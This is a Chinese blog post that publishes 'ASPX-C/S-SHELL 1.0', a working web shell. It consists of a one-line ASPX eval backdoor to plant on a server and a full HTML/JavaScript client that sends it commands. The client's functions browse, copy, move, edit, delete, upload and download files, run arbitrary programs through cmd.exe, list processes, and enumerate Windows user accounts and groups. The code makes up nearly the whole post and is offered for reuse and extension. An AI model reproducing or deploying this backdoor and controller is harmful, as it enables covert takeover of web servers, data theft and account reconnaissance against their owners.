关闭

ASPX-C/S-SHELL 1.0

1467人阅读 评论(0) 收藏 举报

 

Author : kj021320

Team : I.S.T.O 

信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)

服务器端 一句话为

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["z"],"unsafe"));%>

这个一句话不用说了!我之前已经发表文章讲解过!

client端HTML页面代码如下

<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=gb2312">
<title>I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320</title>
<style type="text/css">
 body,td{font-size: 12px;}
table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');}
 input,select{font-size:12px;}
 body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}
 td{white-space:nowrap;}
 a{color:black;text-decoration:none;}
</style>
<!--
Author: kj021320
Team : I.S.T.O
Description:

file/folder  copy,move and view
file  down , edit , delete , upload and run
server config and user information

U can extend the ASPX-C/S-SHELL function and use setCmdText(the js fucntion) to commit the command
-->
<script language="javascript">
 function copyFile(s,t){
  s=s.replace(////g,"////");
  t=t.replace(////g,"////");
  setCmdText('var s="'+s+'",t="'+t+'";System.IO.File.Copy(s,t);');
 }
 function runFile(s,a){
  s=s.replace(////g,"////");
  a=a.replace(////g,"////");
  setCmdText('var s="'+s+'",a="'+a+'";var p=new System.Diagnostics.Process();p.StartInfo.UseShellExecute=false;p.StartInfo.RedirectStandardOutput=true;p.StartInfo.FileName=s;p.StartInfo.Arguments=a;p.Start();var o=p.StandardOutput.ReadToEnd();"<pre>"+o+"<pre>"');
 }
 function editFile(f){
  f=f.replace(////g,"////");
  var code='var stream:System.IO.TextReader,filename,os="",thePath="'+f+'",code;stream=new System.IO.StreamReader(thePath);os=stream.ReadToEnd();os="<form method=post><input name=fname value="+thePath+"><input type=submit name=s value=save><textarea name=t rows=30 style=width:100%;>"+Server.HtmlEncode(os)+"</textarea><input name=//"'+address.KEY.value+'//" type=hidden value=/'var stream:System.IO.TextWriter;stream=new  System.IO.StreamWriter(Request.Item[//"fname//"]);stream.Write(Request.Item[//"t//"]);stream.Close();stream=null;Response.Write(//"OK//")/'></form>";stream.Close();stream=null;os;';
  setCmdText(code);
 }
 function upfile(f){
  f=f.replace(////g,"////");
  setCmdText('var files=Request.Files;if(files.Count!=0)files.Get("myfile").SaveAs("'+f+'");');
 }
 function downFile(f){
  f=f.replace(////g,"////");
  setCmdText('var stream,filename,bs,os,thePath="'+f+'";Response.Clear();bs=new byte[1024];stream=new System.IO.FileStream(thePath,System.IO.FileMode.Open);filename=thePath.substr(thePath.lastIndexOf("////")+1);Response.AddHeader("Content-Disposition","attachment; filename="+Server.UrlEncode(filename).replace("+"," "));Response.AddHeader("Content-Length",stream.Length);Response.Charset="UTF-8";Response.ContentType="application/octet-stream";os=Response.OutputStream;var i=stream.Read(bs,0,bs.Length);while(i>0){os.Write(bs,0,i);i=stream.Read(bs,0,bs.Length);}os=null;Response.Flush();stream.Close();stream=null;Response.End();');
 }
 function ProcessInfo(){
  setCmdText('var o;var proc=System.Diagnostics.Process.GetCurrentProcess();o="<h4>CurrentProcessInfor:</h4>";o+=getProcessInfo(proc);var ptc=proc.Threads;for(var p in ptc){o+="<br>"+getProcessThreadInfo(p);}o+="<h4>OtherProcessInfor:</h4>";var  ps=System.Diagnostics.Process.GetProcesses(proc.MachineName);for(var p in ps){o+="<br>"+getProcessInfo(ps[p]);}function getProcessThreadInfo(pt:System.Diagnostics.ProcessThread):String{var o="<br>Id:"+pt.Id; o+="<br>BasePriority:"+pt.BasePriority; o+="<br>CurrentPriority:"+pt.CurrentPriority;o+="<br>Site:"+pt.Site;o+="<br>StartAddress:"+pt.StartAddress;o+="<br>ThreadState:"+pt.ThreadState;return o;}function getProcessInfo(proc:System.Diagnostics.Process):String{var o="<br>ProcessName:"+proc.ProcessName;o+="<br>BasePriority:"+proc.BasePriority;o+="<br>MachineName:"+proc.MachineName;o+="<br>MainWindowTitle:"+proc.MainWindowTitle;try{o+="<br>MaxWorkingSet:"+proc.MaxWorkingSet;o+="<br>MinWorkingSet:"+proc.MinWorkingSet;}catch(e){}o+="<br>NonpagedSystemMemorySize:"+proc.NonpagedSystemMemorySize;o+="<br>PagedMemorySize:"+proc.PagedMemorySize;o+="<br>PagedSystemMemorySize:"+proc.PagedSystemMemorySize;o+="<br>PeakPagedMemorySize:"+proc.PeakPagedMemorySize;o+="<br>PeakVirtualMemorySize:"+proc.PeakVirtualMemorySize;o+="<br>PeakWorkingSet:"+proc.PeakWorkingSet;o+="<br>PrivateMemorySize:"+proc.PrivateMemorySize;o+="<br>VirtualMemorySize:"+proc.VirtualMemorySize;o+="<br>WorkingSet:"+proc.WorkingSet;return o;}');
 }
 function userInfo(){
  setCmdText('function getUserInfo(strUser:String):String{var User,Flags,o="";try{ User=GetObject("WinNT://./"+strUser+",user");with(User){o+="<br>Description:"+User.Description+"<br>";o+="PasswordExpired:"+Get("PasswordExpired")+"<br>";Flags=Get("UserFlags");o+="passover:"+(Flags==65536)+"<br>";o+="CannotChangPass:"+(Flags==64)+"<br>";o+="GlobalAccount:"+(Flags==256)+"<br>";o+="PasswordMinimumLength:"+PasswordMinimumLength+"<br>";o+="PasswordRequired:"+PasswordRequired+"<br>";o+="AccountDisabled:"+AccountDisabled+"<br>";o+="IsAccountLocked:"+IsAccountLocked+"<br>";o+="Profile:"+Profile+"<br>";o+="LoginScript:"+LoginScript+"<br>";o+="HomeDirectory:"+HomeDirectory+"<br>";o+="HomeDirDrive:"+Get("HomeDirDrive")+"<br>";o+="AccountExpirationDate:"+AccountExpirationDate+"<br>";o+="BadLoginCount:"+BadLoginCount+"<br>";o+="LastLogin:"+LastLogin+"<br>";o+="LastLogoff:"+LastLogoff+"<br>";}}catch(e){}return o;}function Userinfo():String{var User,Group,Computer,o="";Computer=GetObject("WinNT://.");Computer.Filter=new Array("User");o+="User:<hr>";for(User in Computer){o+="<li>"+User.Name+"</li>";o+=getUserInfo(User.Name);o+="<hr>";}o+="UserGroup:<hr>";Computer.Filter=new Array("Group");for(Group in Computer){o+="<li>"+Group.Name+"</li>"+Group.Description+"<hr>";}return o;}Userinfo();');
 }
 function delFile(s){
  s=s.replace(////g,"////");
  setCmdText('var s="'+s+'";System.IO.File.Delete(s);');
 }
 function moveFile(s,t){
  s=s.replace(////g,"////");
  t=t.replace(////g,"////");
  setCmdText('var s="'+s+'",t="'+t+'";if(System.IO.File.Exists(s))System.IO.File.Move(s,t);if(System.IO.Directory.Exists(s))System.IO.Directory.Move(s,t);');
 }
 function Info(){
  setCmdText('var o="";o+="<br>MachineName:"+Environment.MachineName;o+="<br>UserDomainName:"+Environment.UserDomainName;o+="<br>UserName:"+Environment.UserName;o+="<br>OS:"+Environment.OSVersion;o+="<br>ADDRESS:"+Request.ServerVariables("LOCAL_ADDR");o;');
 }
 function check(){
  Top.action=Top.URL.value;
  setCmdName(Top.KEY.value);
  setCmdText("Server.MapPath(/"./")");
 }
 function listFolder(p){
  p=p.replace(////g,"////");
  setCmdText('var p="'+p+'",output="";output+="DIR:<br>";if(System.IO.Directory.Exists(p)){var ds=System.IO.Directory.GetDirectories(p);for(var i in ds)output+=ds[i]+"<br>";output+="FILE:<br>";var fs=System.IO.Directory.GetFiles(p);for(var i in fs)output+=fs[i]+"<br>";}output;');
 }
 function setCmdName(n){
  getCmd().name=n;
 }
 function setCmdText(str){
  getCmd().value=str;
 }
 function getCmd(){
  return document.getElementById("Command");
 }
</script>
</head>
<body>
 <table width=100% height=100% border=0 bgcolor=menu>
 <tr><td height=30 colspan=2>
 <table width=100% height=25 border=0>
 <form name=address method=post target=Display enctype="multipart/form-data" >
 <tr><td width=60 align=center>SHELL:</td><td style=width:80%>
 <input name=URL style=width:90% value="http://127.0.0.1/kj021320.aspx"> KEY:
 <input name=KEY style=width:5%>
 <input name=cmd type=hidden id=Command>
 </td><td align=center><input name=Submit onClick="check();" type=submit value=link>
 </td></tr>
 <tr align=center><td>path:</td><td><input name=path style=width:100%></td><td><input name=view type=submit value=view onclick="listFolder(path.value);"></td></tr>

 <tr align=center><td>Opt:</td><td>source:<input name=sname style=width:40%>target:<input name=tname  style=width:40%></td><td> <input type=submit name=cp value=copy onclick="copyFile(sname.value,tname.value);"><input type=submit name=mv value=move onclick="moveFile(sname.value,tname.value);"></td></tr>

 <tr align=center><td>FileOpt:</td><td>Filepath:<input name=fp style=width:80%></td><td><input type=submit name=down value=down onclick="downFile(fp.value);"><input type=submit name=edit onclick="editFile(fp.value);" value=edit><input type=submit name=del value=del onclick="delFile(fp.value);"></td></tr>
 
 <tr align=center><td>RunFile:</td><td>Filepath:<input name=rfp value="c:/windows/system32/cmd.exe" style=width:40%>Args:<input name=args style=width:40%></td><td><input type=submit name=run value=run onclick="runFile(rfp.value,args.value);"></td></tr>

 <tr align=center><td>Info:</td><td><input type=submit name=req value=Info onclick="Info();"><input type=submit name=proc value=Process onclick="ProcessInfo();"><input type=submit name=userInf value=userInfo onclick="userInfo();"></td><td></td></tr>

 <tr align=center><td>upfile:</td><td><input type=file name=myfile style=width:40%>save:<input type=text name=safile style=width:40%></td><td><input type=submit name=up value=upfile onclick="upfile(safile.value);"></td></tr>
 </form></table></td></tr><tr><td>
 <iframe name=Display width=100% src=http://blog.csdn.net/I_S_T_O/ height=100% scrolling=yes></iframe>
 </td></tr></table>
</body></html>
<script>
 var Top=top.address;
</script>

基本上平时ASPXSHELL的文件操作功能我都加入进去了 注册表跟数据库操作的没写!多加了个进程浏览 用户组浏览 具体更多的功能迟点再更新吧~具体更新信息请关注I.S.T.O 开源项目区http://blog.csdn.net/I_S_T_O/category/325894.aspx  没有实现的功能,有兴趣的朋友可以接力 :)

转载请著名出处

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:2869980次
    • 积分:10356
    • 等级:
    • 排名:第1606名
    • 原创:91篇
    • 转载:33篇
    • 译文:1篇
    • 评论:185条
    最新评论